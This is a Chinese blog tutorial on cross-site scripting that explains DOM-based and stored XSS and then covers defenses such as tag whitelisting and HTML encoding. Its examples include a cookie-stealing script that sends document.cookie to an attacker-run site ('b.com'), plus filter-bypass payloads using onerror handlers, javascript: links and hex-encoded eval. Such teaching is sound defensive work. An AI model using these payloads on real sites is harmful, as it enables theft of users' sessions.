什么是XSS

XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。

Web前端安全之XSS攻击

XSS攻击

XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞。理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。

####基于DOM的XSS
DOM Based XSS是一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人。
当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它测页面处理可能是这样,其它语言类似:

1
2
3
4
5
6
7
8
9
10
<%@ page language=”java”contentType=”text/html; charset=UTF-8″pageEncoding=”UTF-8″%>
<!DOCTYPEhtmlPUBLIC”-//W3C//DTD HTML 4.01 Transitional//EN””http://www.w3.org/TR/html4/loose.dtd”>
<html>
<head>
<title>XSS测试</title>
</head>
<body>
页面内容:<%=request.getParameter(“content”)%>
</body>
</html>

我知道了Tom也注册了该网站,并且知道了他的邮箱(或者其它能接收信息的联系方式),我做一个超链接发给他,超链接地址为:

1
http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>

当Tom点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把Tom在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了Tom在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!这个过程中,受害者只有Tom自己。那当我在浏览器输入

1
a.com?content=<script>alert(“xss”)</script>

浏览器展示页面内容的过程中,就会执行我的脚本,页面输出xss字样,这是攻击了我自己。

####存储型XSS
Stored XSS是存储式XSS漏洞,由于其攻击代码已经存储到服务器上或者数据库中,所以受害者是很多人。
a.com可以发文章,我登录后在a.com中发布了一篇文章,文章中包含了恶意代码,

1
<script>window.open(“www.b.com?param=”+document.cookie)</script>

保存文章。这时Tom和Jack看到了我发布的文章,当在查看我的文章时就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!这个过程中,受害者是多个人。Stored XSS漏洞危害性更大,危害面更广。
XSS主要就是利用漏洞执行你需要执行的js代码,常见的xss:

1
2
3
4
<img scr=1 οnerrοr=alert(‘xss’)>当找不到图片名为1的文件时,执行alert(‘xss’)
<a href=javascrip:alert(‘xss’)>s</a> 点击s时运行alert(‘xss’)
<iframe src=javascript:alert(‘xss’);height=0 width=0 /><iframe>利用iframe的scr来弹窗
<img src=”1″ οnerrοr=eval(“/x61/x6c/x65/x72/x74/x28/x27/x78/x73/x73/x27/x29”)></img>过滤了alert来执行弹窗

XSS分析

很多应用含有富文本内容,这类应用最典型的特征是具有编辑器,例如:博客日志,邮箱等。这类应用往往允许使用一定的HTML代码。为了在用户体验和安全之间寻找平衡,各种厂商可能采用了不尽相同的办法。但是总体来说,有2类。

第1类我们称为白名单,即:只允许使用白名单内的合法HTML标签,例如IMG。其它均剔除。例如:百度贴吧回帖时候的代码过滤方式。
第2类我们称为黑名单,即:厂商会构建一个有危害的HTML标签、属性列表,然后通过分析用户提交的HTML代码,剔除其中有害的部分。 如:QQ邮箱的发邮件时的过滤方式。

白名单要安全得多,而黑名单的方式则经常会被绕过。

绕过的技巧也有很多,我们可以从最没技术含量的开始说起!! 本节将以QQ空间/QQ校友的日志功能为例来说明,什么是“套现绕过富文本”!

注意:本节说的“套现”,不是与“钱”有关的;在这里的含义是:“套用现成的XSS代码”。

XSS防御

我们是在一个矛盾的世界中,有矛就有盾。只要我们的代码中不存在漏洞,攻击者就无从下手,我们要做一个没有缝的蛋。XSS防御有如下方式。永远不相信用户的输入。需要对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉。

Html encode

假如某些情况下,我们不能对用户数据进行严格的过滤,那我们也需要对标签进行转换。

1
2
3
4
5
6
7
8
9
10
11
12
less-than character (<)
&lt;
greater-than character (>)
&gt;
ampersand character (&)
&amp;
double-quote character (“)
&quot;
space character( )
&nbsp;
Any ASCII code character whose code is greater-than or equal to 0x80
&#<number>, where <number> is the ASCII character value.

比如用户输入:

1
<script>window.location.href=”http://www.baidu.com”;</script>

保存后最终存储的会是:

1
&lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;

在展现时浏览器会对这些字符转换成文本内容显示,而不是一段可执行的代码。
JavaScript中有三个可以对字符串编码的函数,分别是: escape,encodeURI,encodeURIComponent,相应3个解码函数:unescape,decodeURI,decodeURIComponent 。

xss资源

  1. 如果你想测测XSS,自己又写不出来高端的xss代码,这里有:http://html5sec.org/
    2.XSS盲打平台beff
    BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentester对这个工具都有很高的赞美。通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人
    官方主页:http://beefproject.com/
    git代码: https://github.com/chalecao/beef

谢谢!

转载请注明出处:http://www.fed123.com/2015/10/30/2015_webxss/
欢迎关注皓眸学问公众号(扫描左侧二维码),每天好文、新技术!任何学习疑问或者工作问题都可以给我留言、互动。T_T 皓眸大前端开发学习 T_T

web 开发安全性问题相关推荐

  1. CSS Tricks网站创始人作序推荐,这本书助你成为Web开发高手

    以下内容来自于 CodePen 联合创始人 Chris Coyier 为<深入解析CSS>一书写的序. "只需一分钟就能学会,却要用一辈子的时间去精通",这句话现在略显 ...

  2. java sessionstate_在Java Web开发中自定义Session

    Session在存储安全性要求较高的会话信息方面是必不可少的,对于分布式Web应用自定义Session支持独立的状态服务器或集群是必须的.本文就来教大家如何在Java Web开发中自定义Session ...

  3. 主流WEB开发语言简单对比(转)

    主流WEB开发语言简单对比  原文链接:http://www.uml.org.cn/site/201401091.asp   随着时间的飞逝,随着岁月的流失.从世界上第一台计算机ENIAC诞生至今,已 ...

  4. php和python web开发-初入Web开发,php、python和ruby应该学哪个?

    php.python和ruby都适合做WEB开发,对于web开发初学者来说,最大的问题就是学习哪种编程语言更适合未来的职业发展并且更有前景.要选择一门适合自己的语言,首先你要考虑php.python和 ...

  5. pythonweb开发-Python Web开发从入门到精通

    Python Web开发从入门到精通循序渐进地讲解了Python Web开发的核心知识,并通过具体实例的实现过程演示了Web开发程序的流程.Python Web开发从入门到精通共15章,内容包括Pyt ...

  6. java session原理_java web开发—session的工作原理总结

    session的工作原理总结 一.什么是session session是一次浏览器和服务器交互的会话,在jsp中,作为一个内置对象存在.我的理解,就是当用户打开网页时,程序会在浏览器中开辟一段空间来存 ...

  7. web开发中常见的安全漏洞及避免方法

    1.安全攻击 1.SQL.HTML.JS.OS命令注入 2.XSS跨站脚本攻击,利用站内信任的用户,在web页面插入恶意script代码 3.CSRF跨站请求伪造,通过伪装来自信任用户的请求来利用受信 ...

  8. 【Web安全】Web开发中常见的安全误区

    安全是Web应用程序不容忽视的一个重要因素,而在Web应用开发中,一些开发者由于缺乏安全方面的意识,导致Web应用存在风险.下面来介绍Web开发中常见的一些安全误区. 如果我们使用Web框架,那么不必 ...

  9. XML Web Service 安全性

    XML Web Service 安全性 来源: 天极网 XML Web Service 安全吗? 鉴于安全性涉及诸多方面(例如身份验证和授权.数据隐私和完整性等),以及 SOAP 规范中根本没有提及安 ...

  10. 作为一个web开发人员,哪些技术细节是在发布站点前你需要考虑到的

    前日在cnblogs上看到一遍文章<每个程序员都必读的12篇文章>,其中大多数是E文的. 先译其中一篇web相关的"每个程序员必知之WEB开发". 原文: http:/ ...

最新文章

  1. bp 字母识别 java_Matlab实现BP网络识别字母
  2. sed编辑器: 非交互
  3. 图像处理:python实现canny算子
  4. java基础(参数传递)
  5. sns.load_dataset使用报错解决URLError: <urlopen error [Errno 11004] getaddrinfo failed>(windows))
  6. 使用 Docker 让传统 .NET 应用程序现代化
  7. java.sql.SQLException: ORA-01438: 值大于此列指定的允许精确度
  8. 前端学习(1557):安全问题
  9. 基于云原生2.0,华为云沃土云创计划全面使能伙伴创新升级
  10. php socket_create_listen(),socket_create_listen()
  11. 使用css打造自定义select(非模拟)
  12. 我的Python成长之路---第三天---Python基础(9)---2016年1月16日(雾霾)
  13. 不服不行!java编程思想第六版下载
  14. ARM的存储控制器以及如何使用SDRAM
  15. noi linux 默认密码,安装NOI Linux
  16. Java实现 蓝桥杯VIP 算法提高 彩票
  17. 北京大学C语言学习第6天
  18. eclipse升级adt
  19. const*与*const的区别
  20. Numpy中reshape函数、reshape(1,-1)的含义(浅显易懂,源码实例)

热门文章

  1. F5 root密码恢复
  2. [转]Linux平台下的service程序编写指南
  3. 集合框架-ArrayList,Vector,Linkedlist
  4. Access、CorelDRAW总结
  5. vue2.0配置 https://github.com/wike933/vuebook
  6. 15.SpringMVC和Spring上下文关系(为什么SpringMVC可以调用到Spring)
  7. 给大家推荐个vs里面的小插件,自动对齐代码
  8. mediaplay抓图
  9. 四窗口能分布到四台显示器上吗? 回答 Galactica 的提问
  10. Java泛型:泛型的定义(类、接口、对象、方法)、使用、继承